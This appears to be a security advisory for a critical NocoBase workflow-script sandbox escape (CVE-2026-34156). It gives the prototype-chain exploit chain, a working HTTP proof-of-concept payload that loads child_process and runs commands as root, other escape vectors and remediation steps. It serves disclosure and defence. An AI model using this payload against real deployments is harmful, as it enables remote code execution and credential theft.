PT-2026-29158 · Npm · @Nocobase/Plugin-Workflow-Javascript

Published

2026-03-30

·

Updated

2026-03-30

·

CVE-2026-34156

CVSS v3.1

9.9

Critical

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
## Summary
NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW SCRIPT MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console. stdout and console. stderr.
An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

  1. console. stdout.constructor.constructor → host-realm Function constructor
  2. Function('return process')() → Node.js process object
  3. process.mainModule.require('child process') → unrestricted module loading
  4. child process.execSync('id') → RCE as root
This completely bypasses the customRequire allowlist.

Impact

  • Remote Code Execution as root (uid=0) inside Docker container
  • Database credential theft (DB PASSWORD, INIT ROOT PASSWORD from process.env)
  • Arbitrary file read/write via require('fs')
  • Reverse shell confirmed
  • Outbound network access for lateral movement

Proof of Concept

HTTP Request:
POST /api/flow nodes:test Authorization: Bearer Content-Type: application/json
{ "type": "script", "config": { "content": "const Fn=console. stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child process');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }
Response:
{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

  • Docker image: nocobase/nocobase:latest
  • NocoBase CLI: v2.0.26
  • Node.js: v20.20.1
  • OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell
Screenshot 2026-03-26 at 06 09 51
Proof of concept the root privileges
Screenshot 2026-03-26 at 06 12 29
os-release demonstration
Screenshot 2026-03-26 at 06 12 54 image
App path
Screenshot 2026-03-26 at 06 14 04

Exploit Usage:

Reverse Shell Mode
tool1
Dump system information & creds
tool2
Remote Command Execution Mode
tool3

Remediation

  1. Replace Node.js vm module with isolated-vm for true V8 isolate separation
  2. Do not pass the host console object into the sandbox; create a clean proxy
  3. Run the application as a non-root user inside Docker
  4. Restrict /api/flow nodes:test to admin-only roles

Alternative Escape Vectors

  • console. stderr.constructor.constructor (identical chain via stderr)
  • Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç — Independent Security Researcher, Bilkent University

Fix

Weakness Enumeration

CWE-913

Related Identifiers

CVE-2026-34156
GHSA-PX3P-VGH9-M57C

Affected Products

@Nocobase/Plugin-Workflow-Javascript